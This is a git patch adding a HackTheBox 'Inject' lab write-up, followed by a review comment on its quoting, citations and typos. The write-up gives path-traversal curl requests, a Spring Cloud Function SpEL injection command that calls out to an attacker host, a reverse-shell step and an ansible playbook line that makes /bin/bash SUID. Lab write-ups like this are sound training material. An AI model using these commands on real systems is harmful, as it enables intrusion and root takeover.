From 211b374d712bba35414cb8886233bbc12119f6cc Mon Sep 17 00:00:00 2001
From: ARZ <60057481+AbdullahRizwan101@users.noreply.github.com>
Date: Mon, 10 Jul 2023 22:13:11 +0300
Subject: [PATCH] Create Inject.md
---
HackTheBox/Inject.md | 130 +++++++++++++++++++++++++++++++++++++++++++
1 file changed, 130 insertions(+)
create mode 100644 HackTheBox/Inject.md
diff --git a/HackTheBox/Inject.md b/HackTheBox/Inject.md
new file mode 100644
index 0000000..903207c
--- /dev/null
+++ b/HackTheBox/Inject.md
@@ -0,0 +1,130 @@
+# HackTheBox - Inject
+## NMAP
+
+```
+Nmap scan report for 10.10.11.204
+Host is up (0.14s latency).
+Not shown: 65533 closed tcp ports (reset)
+PORT STATE SERVICE VERSION
+22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey:
+| 3072 caf10c515a596277f0a80c5c7c8ddaf8 (RSA)
+| 256 d51c81c97b076b1cc1b429254b52219f (ECDSA)
+|_ 256 db1d8ceb9472b0d3ed44b96c93a7f91d (ED25519)
+8080/tcp open nagios-nsca Nagios NSCA
+| http-methods:
+|_ Supported Methods: GET HEAD OPTIONS
+|_http-title: Home
+Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+```
+
+Scanning the machine, we have two ports out which port 8080 is interesting to us as there's a web server running
+
+## PORT 8080
+
+
+
+There's an option for login and signup but login doesn't take you anywhere so visting signup page
+
+
+
+There is however an option to upload files on the home page
+
+
+
+
+
+On trying to upload file normal txt file, it only shows that image file can be uploaded
+
+
+
+## Foothold
+
+I got exahausted for trying to upload php files but it didn't work and it was a huge rabbit hole for me but if we notice how it's fetching the uploaded files
+
+
+
+It's using a GET parameter for fetching the files, trying for LFI, it didn't showed any results on the browser but if we send a request from `curl` it will show that it's indeed vulnerable
+
+
+
+```
+curl 'http://10.10.11.204:8080/show_image?img=../../../../../../etc/passwd'
+```
+
+
+
+We can also see what files are there in the web root's directory by just traversing upto that path
+
+```
+curl 'http://10.10.11.204:8080/show_image?img=../../../'
+```
+
+
+
+We can read `pom.xml` file which tells about the infromation of the project
+
+
+
+
+
+Here we can find `Spring Framework cloud` version `3.2.2` being used, on searching for vulnerabilities, spring cloud function is vulnerable to remote code execution by `spring.cloud.function.routing-expression` paramter and SpEL (Spring Expression Language) to execute system commands on the machine
+
+```bash
+curl -X POST http://10.10.11.204:8080/functionRouter -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("curl 10.10.14.21")' --data-raw 'data'
+```
+
+
+
+To get a reverse shell, we can add our payload in a shell script, upload it and execute it on the server
+
+
+
+
+
+
+
+
+Stabilizing the shell with python
+
+
+
+## Privilege Escalation (Phil)
+
+We can escalate to phil user by getting his password from `.m2` directory in `settings.xml` file
+
+
+
+Checking in what groups this user is in
+
+
+
+With `find` we can look for files or folders on which this group has access
+
+
+
+Running `pspy` we can run see `ansible-playbook` being ran as root user and executing the yaml file
+
+
+
+## Privilege Escalation (root)
+
+We can escalate our privileges to root by `shell` paramter in our ansible yaml file to execute commands as root user `/opt/automation/tasks`
+
+```bash
+echo '[{hosts: localhost, tasks: [shell: 'chmod +s /bin/bash' ]}]' > playbook_2.yml
+```
+
+
+
+With `chmod +s /bin/bash` we can make bash a SUID meaning it will be executed as root on running it with `-p`
+
+
+
+
+
+## References
+
+- https://github.com/me2nuk/CVE-2022-22963
+- https://docs.ansible.com/ansible/2.9/modules/shell_module.html
+
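Review bot: the playbook one-liner in the root section (`+echo '[{hosts: localhost, tasks: [shell: 'chmod +s /bin/bash' ]}]' > playbook_2.yml`) has broken shell quoting: the inner single quotes terminate the outer string, so the shell concatenates fragments and the file only ends up as valid YAML by accident; wrap the whole document in double quotes and keep the single quotes around the command so the intended scalar survives. The Spring Cloud Function section should cite CVE-2022-22963 inline rather than only in the references, and it would help readers if the version claim were tied to the exact `pom.xml` artifact it was read from. Each step is followed by runs of blank lines where screenshots appear to have been dropped; either restore the image links or remove the empty lines. Finally, fix the typos ("exahausted", "visting", "infromation", "paramter" twice, "didn't showed", "upto", "being ran") so the write-up reads cleanly.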